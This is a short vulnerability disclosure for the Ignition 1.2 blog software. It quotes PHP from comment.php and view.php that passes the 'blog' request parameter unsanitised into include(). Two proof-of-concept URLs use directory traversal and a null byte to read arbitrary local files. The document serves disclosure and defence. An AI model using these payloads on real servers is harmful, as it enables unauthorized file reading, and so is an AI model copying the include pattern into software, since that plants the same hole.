Ignition 1.2 Multiple Local File Inclusion Vulnerabilities
disclosed by cOndemned
download: http://launchpadlibrarian.net/27567060/ignition_1.2.zip
note: magic_quotes_gpc should be turned off in order to exploit this vulnerability
greetz: all friends, SecurityReason team :)
 
 
comment.php
 
    1.  <?php
    2.  session_start();
    3.  require ('settings.php');
    4.  include ('posts/'.$_GET['blog'].'.txt');            # [1]
    5.  ?>
 
 
view.php
 
    1.  <?php
    2.  session_start();
    3.  require ('settings.php');
    4.  $blog = $_GET['blog'];
    5.  if (file_exists('posts/'.$_GET['blog'].'.txt')) {
    6.  include ('posts/'.$_GET['blog'].'.txt');            # [2]
    7.  }else{
 
 
proof of concept:
 
    [1] http://[attacked_box]/[ignition1.2]/comment.php?blog=../../../../[local_file]%00
    [2] http://[attacked_box]/[ignition1.2]/view.php?blog=../../../../../[local_file]%00